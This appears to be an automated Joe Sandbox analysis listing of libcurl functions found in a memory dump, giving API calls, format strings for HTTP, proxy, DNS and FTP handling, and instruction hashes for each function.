                                                                                                                                  • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                                  • API String ID: 3213019040-1595554923
                                                                                                                                  • Opcode ID: 74a33f8eb84c51fb9fea66b6649eeb8375ef3fec14f9ff2591f4acd5f767bc21
                                                                                                                                  • Instruction ID: 467f5f5046db05a30011fd44ce04951c29754a0a6a736c8c890c64af3684475d
                                                                                                                                  • Opcode Fuzzy Hash: 74a33f8eb84c51fb9fea66b6649eeb8375ef3fec14f9ff2591f4acd5f767bc21
                                                                                                                                  • Instruction Fuzzy Hash: 0B91EFB1A00B859BDB119F698981B4777FEAF843D8B108C7DF84AD7611E73CE8068B51
                                                                                                                                  Function 6B8FD510 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 350COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD566
                                                                                                                                  • curl_mfprintf.LIBCURL(89000005,** Resuming transfer from byte position %I64d,00051C86,BF830000,83C70000,00000620,000F4240,00000000,868D0000,6B8E1696,?), ref: 6B8FD59D
                                                                                                                                  • curl_mfprintf.LIBCURL(89000005, %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed,83C70000,00000620,000F4240,00000000,868D0000,6B8E1696,?), ref: 6B8FD5B0
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD5FF
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD623
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD636
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD677
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD6D5
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD702
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD715
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD76F
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD891
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD8A1
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FD8C7
                                                                                                                                  • curl_mfprintf.LIBCURL(89000005,%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 6B8FD9A1
                                                                                                                                  Strings
                                                                                                                                  • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6B8FD5A5
                                                                                                                                  • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6B8FD996
                                                                                                                                  • ** Resuming transfer from byte position %I64d, xrefs: 6B8FD592
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_mfprintf
                                                                                                                                  • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                                                                                                                  • API String ID: 2030109004-664487449
                                                                                                                                  • Opcode ID: e0023093bc332130ba7ecf1f3d2b5e57b4dd63c1d220d25170e5be1ca3538a93
                                                                                                                                  • Instruction ID: 9551a7cb5d0ebcd34bdcfde914e7dbeb39c39b0b20cbc91be099696f1ea9f666
                                                                                                                                  • Opcode Fuzzy Hash: e0023093bc332130ba7ecf1f3d2b5e57b4dd63c1d220d25170e5be1ca3538a93
                                                                                                                                  • Instruction Fuzzy Hash: 81E12F75A407089FEB208BB8CC41BAABBB9BF45348F108859AA5DA7251DB396841DF50
                                                                                                                                  Function 6B8EAA80 Relevance: 31.8, APIs: 10, Strings: 8, Instructions: 269COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8EAB26
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8EAB3C
                                                                                                                                  • curl_strnequal.LIBCURL(Host:,00000000,00000005), ref: 6B8EAC1A
                                                                                                                                  • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B8EAC3E
                                                                                                                                  • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B8EAC62
                                                                                                                                  • curl_strnequal.LIBCURL(Content-Length:,00000000,0000000F), ref: 6B8EAC86
                                                                                                                                  • curl_strnequal.LIBCURL(Connection:,00000000,0000000B), ref: 6B8EACAA
                                                                                                                                  • curl_strnequal.LIBCURL(Transfer-Encoding:,00000000,00000012), ref: 6B8EACCE
                                                                                                                                  • curl_strnequal.LIBCURL(Authorization:,00000000,0000000E), ref: 6B8EACE2
                                                                                                                                  • curl_strnequal.LIBCURL(Cookie:,00000000,00000007,?,?,?,?,?,?,6B8EE55E), ref: 6B8EACF6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal$___from_strstr_to_strchr
                                                                                                                                  • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
                                                                                                                                  • API String ID: 431725195-2985882615
                                                                                                                                  • Opcode ID: 5d87a5f4419c2e7a08b88f237137a572b377d864794a789a19492a3e37228322
                                                                                                                                  • Instruction ID: 001de49fb246a9a3f9d0086516fde11f022170df909a37d49f49111b57d96e13
                                                                                                                                  • Opcode Fuzzy Hash: 5d87a5f4419c2e7a08b88f237137a572b377d864794a789a19492a3e37228322
                                                                                                                                  • Instruction Fuzzy Hash: A4916871E04205ABEB108E64D940B967BB6AF43B1CF0448F8EC589B242E77ED947C7B0
                                                                                                                                  Function 6B8E4770 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 254COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_url.LIBCURL(00000000,00000000,6B8E2F71), ref: 6B8E478E
                                                                                                                                  • curl_url_set.LIBCURL(00000000,00000000,00000000,00000208,00000000,00000000,6B8E2F71), ref: 6B8E47A6
                                                                                                                                  • curl_url_get.LIBCURL(6B8E2F71,00000001,00000000,00000000,?,00000000,00000000,6B8E2F71), ref: 6B8E47C0
                                                                                                                                  • curl_url_cleanup.LIBCURL(6B8E2F71,?,?,?,?,00000000,00000000,6B8E2F71), ref: 6B8E4A84
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_urlcurl_url_cleanupcurl_url_getcurl_url_set
                                                                                                                                  • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
                                                                                                                                  • API String ID: 4131495542-874090715
                                                                                                                                  • Opcode ID: 17f75bc3dd07b6c412261e3e287406e80ba40f0022a2be9e5555dc7eff4317c6
                                                                                                                                  • Instruction ID: 1191b326b030e87c91b1d450db3abfe5795d61b52d92713cb925e5b979686c24
                                                                                                                                  • Opcode Fuzzy Hash: 17f75bc3dd07b6c412261e3e287406e80ba40f0022a2be9e5555dc7eff4317c6
                                                                                                                                  • Instruction Fuzzy Hash: 4C91C275C44219ABDF009FA5CC41B9EBBB4AF82309F0844B9ED1877251E739DA12DBB1
                                                                                                                                  Function 6B8ECF60 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 245COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(Authorization: Bearer %s,?,?,?,?,?,?,?,?,?), ref: 6B8ECFF2
                                                                                                                                  • curl_maprintf.LIBCURL(%s:%s,?,6B93B98E,?,00000000), ref: 6B8ED106
                                                                                                                                  • curl_maprintf.LIBCURL(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B8ED180
                                                                                                                                    • Part of subcall function 6B8F48E0: curl_mvaprintf.LIBCURL(?,?,?,6B8D66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B8F48EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_maprintf$curl_mvaprintf
                                                                                                                                  • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                                  • API String ID: 3491783128-3980008082
                                                                                                                                  • Opcode ID: be52859626718121c403697bf5e58aa33d6cadb7c4e272c395097a1ee2bc2585
                                                                                                                                  • Instruction ID: 713c70b01bbbde266f82553f4b9634b1f9d18d721a5bde1833b1fc44bca1d672
                                                                                                                                  • Opcode Fuzzy Hash: be52859626718121c403697bf5e58aa33d6cadb7c4e272c395097a1ee2bc2585
                                                                                                                                  • Instruction Fuzzy Hash: 6281C635A44119AFDB008E68D8517AAB7B4EF87355F0884A6FC08DB311D339DD56CBB1
                                                                                                                                  Function 6B8E4AA0 Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 357COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_url_dup.LIBCURL(?,00000000,?,?,?), ref: 6B8E4AD5
                                                                                                                                  • curl_url.LIBCURL(00000000,?,?,?), ref: 6B8E4AE4
                                                                                                                                  • curl_maprintf.LIBCURL(%s://%s,?,?,?,?,?,00000000,?,?,?), ref: 6B8E4B43
                                                                                                                                  • curl_url_set.LIBCURL(00000000,00000000,?,00000208), ref: 6B8E4B97
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000000,?,00000000,?,?,?,?,00000000,?,?,?), ref: 6B8E4BDB
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000001,?,00000000), ref: 6B8E4C1A
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000002,?,00000000), ref: 6B8E4CA5
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000003,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B8E4D10
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000004,?,00000040), ref: 6B8E4D77
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000005,?,00000000), ref: 6B8E4DBD
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000007,?,00000000), ref: 6B8E4DEC
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000006,?,00000001), ref: 6B8E4E08
                                                                                                                                  • curl_url_get.LIBCURL(00000000,00000008,?,00000000), ref: 6B8E4E6A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_url_get$curl_maprintfcurl_urlcurl_url_dupcurl_url_set
                                                                                                                                  • String ID: %s://%s$Protocol "%s" not supported or disabled in libcurl$file
                                                                                                                                  • API String ID: 3053744392-4150109901
                                                                                                                                  • Opcode ID: aa746414202becf7b34aae8918f7a7eb40ecc0ddd960321f79ee78a7fc658fb5
                                                                                                                                  • Instruction ID: c4b7d754c5cc4e7ebbc12e5a838bcb49fda35833736992f0236efc72e4859db2
                                                                                                                                  • Opcode Fuzzy Hash: aa746414202becf7b34aae8918f7a7eb40ecc0ddd960321f79ee78a7fc658fb5
                                                                                                                                  • Instruction Fuzzy Hash: 63C11775A447046BEB119A38DC41BEA37E8EF82308F0808A9FD5DCB242E77AE551D771
                                                                                                                                  Function 6B8E7E80 Relevance: 23.1, APIs: 4, Strings: 9, Instructions: 386COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000007,:%u,?), ref: 6B8E7F89
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E8007
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E80B6
                                                                                                                                  Strings
                                                                                                                                  • Resolve address '%s' found illegal!, xrefs: 6B8E81A2
                                                                                                                                  • Couldn't parse CURLOPT_RESOLVE removal entry '%s'!, xrefs: 6B8E7EFB
                                                                                                                                  • *, xrefs: 6B8E82DD
                                                                                                                                  • %255[^:]:%d, xrefs: 6B8E7EE6
                                                                                                                                  • Couldn't parse CURLOPT_RESOLVE entry '%s'!, xrefs: 6B8E831E
                                                                                                                                  • Added %s:%d:%s to DNS cache, xrefs: 6B8E82CF
                                                                                                                                  • RESOLVE %s:%d is wildcard, enabling wildcard checks, xrefs: 6B8E82FC
                                                                                                                                  • RESOLVE %s:%d is - old addresses discarded!, xrefs: 6B8E824E
                                                                                                                                  • :%u, xrefs: 6B8E7F81, 6B8E81EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchrcurl_msnprintf$curl_mvsnprintf
                                                                                                                                  • String ID: %255[^:]:%d$*$:%u$Added %s:%d:%s to DNS cache$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!$RESOLVE %s:%d is - old addresses discarded!$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal!
                                                                                                                                  • API String ID: 3777538264-1944672612
                                                                                                                                  • Opcode ID: 5432a602540d38d47063397a667f97673d92197c13b781ca8831629f60fd2aed
                                                                                                                                  • Instruction ID: 36b8a7f25ffe776ce240b670fbc7f4f96ff832db1cbd37e624655b3abdf8418f
                                                                                                                                  • Opcode Fuzzy Hash: 5432a602540d38d47063397a667f97673d92197c13b781ca8831629f60fd2aed
                                                                                                                                  • Instruction Fuzzy Hash: DBD11871D046299FDB218F74CC84BAEB778EF42308F1005E9D85C67242E739AA46CFA0
                                                                                                                                  Function 6B8DDE80 Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 375COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DDEE5
                                                                                                                                  • curl_maprintf.LIBCURL(%u.%u.%u.%u,00000000,00000000,00000000,00000000), ref: 6B8DE134
                                                                                                                                    • Part of subcall function 6B8F48E0: curl_mvaprintf.LIBCURL(?,?,?,6B8D66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B8F48EA
                                                                                                                                    • Part of subcall function 6B8E84A0: inet_pton.WS2_32(00000002,00000000,?), ref: 6B8E8590
                                                                                                                                    • Part of subcall function 6B8E84A0: inet_pton.WS2_32(00000017,00000000,?), ref: 6B8E85C0
                                                                                                                                    • Part of subcall function 6B8D2A60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8D2BA0
                                                                                                                                  Strings
                                                                                                                                  • %u,%u,%u,%u,%u,%u, xrefs: 6B8DE06A
                                                                                                                                  • Connecting to %s (%s) port %d, xrefs: 6B8DE304
                                                                                                                                  • Can't resolve proxy host %s:%hu, xrefs: 6B8DE1DD
                                                                                                                                  • %u.%u.%u.%u, xrefs: 6B8DE12F
                                                                                                                                  • %c%c%c%u%c, xrefs: 6B8DDF1B
                                                                                                                                  • Illegal port number in EPSV reply, xrefs: 6B8DDF60
                                                                                                                                  • Weirdly formatted EPSV reply, xrefs: 6B8DDFCA
                                                                                                                                  • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 6B8DE10E
                                                                                                                                  • Can't resolve new host %s:%hu, xrefs: 6B8DE257
                                                                                                                                  • Bad PASV/EPSV response: %03d, xrefs: 6B8DE3A3
                                                                                                                                  • Couldn't interpret the 227-response, xrefs: 6B8DE083
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: inet_pton$Unothrow_t@std@@@___from_strstr_to_strchr__ehfuncinfo$??2@curl_maprintfcurl_mvaprintf
                                                                                                                                  • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                                                                                                                  • API String ID: 1323756762-2414412286
                                                                                                                                  • Opcode ID: 5934a7afd7853a5166c74d2cdb9f23892c0c91a4cc4c85c32c686b7b49e31ee9
                                                                                                                                  • Instruction ID: 33d4195edb27e35d6a8a9ad4a9548b2b8dcd9d3d8e6a1e78d3129a2aba4f7d9f
                                                                                                                                  • Opcode Fuzzy Hash: 5934a7afd7853a5166c74d2cdb9f23892c0c91a4cc4c85c32c686b7b49e31ee9
                                                                                                                                  • Instruction Fuzzy Hash: 28D1D471E04129ABDB259B64CC41BEAF7B8FF45319F0005E7E909A7241D73DAA908FE1
                                                                                                                                  Function 6B8EB5C0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Negotiate,?,00000009,00000000,?,?,?,00000000), ref: 6B8EB61C
                                                                                                                                  • curl_strnequal.LIBCURL(NTLM,?,00000004,00000000,?,?,?,00000000), ref: 6B8EB6A0
                                                                                                                                  • curl_strnequal.LIBCURL(Digest,?,00000006,?,?,?,00000000,?,?,?,00000000), ref: 6B8EB704
                                                                                                                                  • curl_strnequal.LIBCURL(Basic,?,00000005,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 6B8EB75D
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal$curl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate$t!
                                                                                                                                  • API String ID: 4236074386-280430007
                                                                                                                                  • Opcode ID: dec0d8a2eaae250b253e361bd0bf1b82b89f1e333202ddb69dbe9e65890813b8
                                                                                                                                  • Instruction ID: 2c47081c67c9e5c331729dcb0518311ed2f2f606cdabcca41f5df853d79fe57d
                                                                                                                                  • Opcode Fuzzy Hash: dec0d8a2eaae250b253e361bd0bf1b82b89f1e333202ddb69dbe9e65890813b8
                                                                                                                                  • Instruction Fuzzy Hash: 3E613934904305EBEB008E75DCC17967BE59F43348F1088A4DCA9AB652E73AD956CBB1
                                                                                                                                  Function 6B90E810 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 288COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • curl_slist_free_all.LIBCURL(00000000,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B90E994
                                                                                                                                    • Part of subcall function 6B8EB530: ___from_strstr_to_strchr.LIBCMT ref: 6B8EB55B
                                                                                                                                  • curl_slist_free_all.LIBCURL(00000000,?,Successfully compiled trailers.,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B90E8CD
                                                                                                                                  • curl_msnprintf.LIBCURL(?,0000000B,%zx%s,?,6B93BF70), ref: 6B90EAC6
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  Strings
                                                                                                                                  • operation aborted by callback, xrefs: 6B90E945
                                                                                                                                  • operation aborted by trailing headers callback, xrefs: 6B90E96F
                                                                                                                                  • Successfully compiled trailers., xrefs: 6B90E8BF
                                                                                                                                  • Signaling end of chunked upload via terminating chunk., xrefs: 6B90EB1B
                                                                                                                                  • Moving trailers state machine from initialized to sending., xrefs: 6B90E842
                                                                                                                                  • %zx%s, xrefs: 6B90EAA9
                                                                                                                                  • Read callback asked for PAUSE when not supported!, xrefs: 6B90E9DC
                                                                                                                                  • Signaling end of chunked upload after trailers., xrefs: 6B90EBBE
                                                                                                                                  • read function returned funny value, xrefs: 6B90EA35
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintfcurl_mvsnprintfcurl_slist_free_all$___from_strstr_to_strchr
                                                                                                                                  • String ID: %zx%s$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                                                                                                                  • API String ID: 2651734479-586909597
                                                                                                                                  • Opcode ID: 09b59b6dd441754f43b1a814e6bfc4cc9bfa25db60db99397b40858b66a29a44
                                                                                                                                  • Instruction ID: 6d3435f86b5f41f0a3e77c8b81f6a1d67213f998d36d6c3464f1ad9ccf9e22c7
                                                                                                                                  • Opcode Fuzzy Hash: 09b59b6dd441754f43b1a814e6bfc4cc9bfa25db60db99397b40858b66a29a44
                                                                                                                                  • Instruction Fuzzy Hash: ECA10971E04609ABD714CF74D8827EEFBB8AF55318F00425EE819A7280DB7DE9948BD1
